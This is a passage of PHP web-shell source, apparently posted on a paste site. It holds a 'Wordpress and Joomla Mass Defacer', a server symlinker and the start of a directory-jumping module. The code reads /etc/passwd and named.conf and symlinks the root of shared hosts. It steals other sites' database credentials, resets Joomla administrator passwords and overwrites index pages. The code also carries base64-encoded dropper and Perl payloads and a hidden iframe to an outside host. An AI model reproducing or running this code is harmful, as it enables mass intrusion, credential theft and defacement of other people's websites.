/>";$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');$cond = 1;}} else {$output.= "[-] index.php can not load in Theme Editor<br />";}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.'COOKIE.txt');return array('cond'=>$cond, 'output'=>$output);}function index_changer_joomla($conf, $content, $domain) {$doler = '$';$username = entre2v2($conf, $doler."user = '", 
"';");$password = entre2v2($conf, $doler."password = '", "';");$dbname = entre2v2($conf, $doler."db = '", "';");$prefix = entre2v2($conf, $doler."dbprefix = '", "';");$host = entre2v2($conf, $doler."host = '","';");$co=randomt();$site_url = "http://".$domain."/administrator";$output = '';$cond = 0; $link=mysql_connect($host, $username, $password);if($link) {mysql_select_db($dbname,$link) ;$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));} else {$output.= "[-] DB Error<br />";}if($req1){if ($req) {$req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");$data = mysql_fetch_array($req);$template_name = $data["template"];$req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");$data = mysql_fetch_array($req);$template_id = $data["extension_id"];$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);if($return && $hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_REFERER, $url2);curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 
0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos){$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);if($hidden2) {$output.= "[+] index.php file found in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}} else {$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");$data = mysql_fetch_array($req);$template_name=$data["template"];$useragent="Mozilla/4.0 
(compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);if($hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos) {$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);if($hidden2) {$output.= "[+] index.php file founded in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, 
CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co);$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message fade">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.$co);return array('cond'=>$cond, 'output'=>$output); }function exec_mode_1($def_url) {@mkdir('sym',0777);$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$fp = @fopen ('sym/.htaccess','w');fwrite($fp, $wr);@symlink('/','sym/root');$dominios = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);$out[1] = array_unique($out[1]);$numero_dominios = count($out[1]);echo "Total domains: $numero_dominios <br><br />";$def = file_get_contents($def_url);$def = urlencode($def);$dd = 
'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5vcmcvZGVmYWNlZC8yMDEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZSgncHVibGljX2h0bWwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY19odG1sJzsNCmlmICgkaGFuZGxlID0gb3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG0nLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9DQpjbG9zZWRpcigkaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo/Pg==';$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';$output = fopen('defaced.html', 'a+');$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;echo '<table style="width:75%;" align="center"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;for($i = $st; $i <= $numero_dominios; $i++){$domain = $out[1][$i];$dono_arquivo = @fileowner("/etc/valiases/".$domain);$infos = @posix_getpwuid($dono_arquivo);if($infos['name']!='root') {$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");$cls = ($j % 2 == 0) ? 
'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count1'] = $_SESSION['count1'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}$cls = ($j % 2 == 0) ? 
'class="even"' : 'class="odd"';if($config03 && preg_match('/DB_NAME/i',$config03)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config03, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($_SESSION['count1']+$_SESSION['count2'] > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_2($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def);$output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
  1261. NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
  1262. h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
  1263. G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
  1264. YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
  1265. kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
  1266. B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i = 1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 
'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' 
(JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_3($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def); $output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
  1267. kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
  1268. VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
  1269. 3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
  1270. cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
  1271. MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
  1272. R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/data.txt', $_POST['man_data']);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i=1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 
'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' 
(JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}echo '<!DOCTYPE html><html><head><link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css"><style type="text/css">.header {position:fixed;width:100%;top:0;background:#000;}.footer {position:fixed;width:100%;bottom:0;background:#000;}input[type="radio"]{margin-top: 0;}.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}.even {background-color: rgba(25, 25, 25, 0.6);}.odd {background-color: rgba(102, 102, 102, 0.6);}textarea{background: rgba(0,0,0,0.6); color: white;}.green {color:#00FF00;font-weight:bold;}.red {color:#FF0000;font-weight:bold;}</style><script type="text/javascript">function change() {if(document.getElementById(\'rcd\').checked == true) {document.getElementById(\'tra\').style.display = \'\';} else {document.getElementById(\'tra\').style.display = \'none\';}}function hide() {document.getElementById(\'tra\').style.display = \'none\';}</script></head><body><h2 style="font-size:25px;color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';if(!isset($_POST['form_action']) && !isset($_GET['mode'])){echo '<form action="" method="post"><table align=center><tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" id="rcd" 
onclick="change();"></td><td>manual copy of /etc/passwd</td></tr><tr id="tra" style="display: none;"><td></td><td><textarea cols="60" rows="10" name="man_data"></textarea></td></tr></table><br><input type="hidden" name="form_action" value="1"><table align=center><tr><td><b>index url: </b><input class="inputz" size="45" type="text" name="defpage" value=""></tr></td></table><center><input class="inputzbut" type="submit" value="Attack !" name="Submit"></center></form>';}$milaf_el_index = $_POST['defpage'];if($_POST['form_action'] == 1) {if($_POST['mode']==1) { exec_mode_1($milaf_el_index); }if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }}if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }echo '<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
  1273. </body></html>';
  1274. }
  1275. } elseif($_GET['do'] == 'symser'){
  1276. $d0mains = @file("/etc/named.conf");
  1277. if($d0mains){@mkdir("/priv_sym",0777);@chdir("/priv_sym");@exe("ln -s / root");$file3 = 'Options all
  1278. DirectoryIndex Priv.html
  1279. AddType text/plain .php
  1280. AddHandler server-parsed .php
  1281. AddType text/plain .html
  1282. AddHandler txt .html
  1283. Require None
  1284. Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=3>S. No.</font></td><td align=center><font size=3>Domains</font></td><td align=center><font size=3>Users</font></td><td align=center><font size=3>Symlink</font></td></tr>";$dcount = 1;foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr align=center><td><font size=3>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td>".$user['name']."</td><td><a href='/k2/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>"; flush();$dcount++;}}}echo "</table>";}else{$TEST=@file('/etc/passwd');if ($TEST){@mkdir("priv",0777);@chdir("priv");exe("ln -s / root");$file3 = 'Options all
  1285. DirectoryIndex Priv.html
  1286. AddType text/plain .php
  1287. AddHandler server-parsed .php
  1288. AddType text/plain .html
  1289. AddHandler txt .html
  1290. Require None
  1291. Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<br><br><table align=center border=1><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";$dcount = 1;$file = fopen("/etc/passwd", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";echo "<td align=center><font class=txt><a href=/priv/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";$dcount++;}fclose($file);echo "</table>";}else{if($os != "Windows"){@mkdir("priv",0777);@chdir("priv");@exe("ln -s / root");$file3 = 'Options all
  1292. DirectoryIndex Priv.html
  1293. AddType text/plain .php
  1294. AddHandler server-parsed .php
  1295. AddType text/plain .html
  1296. AddHandler txt .html
  1297. Require None
  1298. Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<br><br><center><h2 class='cgx2'>server symlinker</h2><table align=center border=1><tr><td align=center><font size=4>id</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";$temp = "";$val1 = 0;$val2 = 1000;for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);if ($uid)$temp .= join(':',$uid)."\n";}echo '<br/>';$temp = trim($temp);$file5 = fopen("test.txt","w");fputs($file5,$temp);fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";echo "<td align=center><font class=txt><a href=/priv/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";$dcount++;}fclose($file);echo "</table></center>";unlink("test.txt");} else echo "<center><font size=4>Cannot create Symlink</font></center>";}}
  1299.  
  1300. }elseif($_GET['do'] == 'jumping') {
  1301. $i = 0;
  1302. echo "<div class='margin: 5px auto;'>";
  1303. if(preg_match("/hsphere/", $dir)) {
  1304. $urls = explode("\r\n", $_POST['url']);
  1305. if(isset($_POST['jump'])) {
  1306. echo "<pre>";
  1307. foreach($urls as $url) {
  1308. $url = str_replace(array("http://","www."), "", strtolower($url));
  1309. $etc = "/etc/passwd";
  1310. $f = fopen($etc,"r");
  1311. while($gets = fgets($f)) {
  1312. $pecah = explode(":", $gets);
  1313. $user = $pecah[0];
  1314. $dir_user = "/hsphere/local/home/$user";
  1315. if(is_dir($dir_user) === true) {
  1316. $url_user = $dir_user."/".$url;
  1317. if(is_readable($url_user)) {
  1318. $i++;
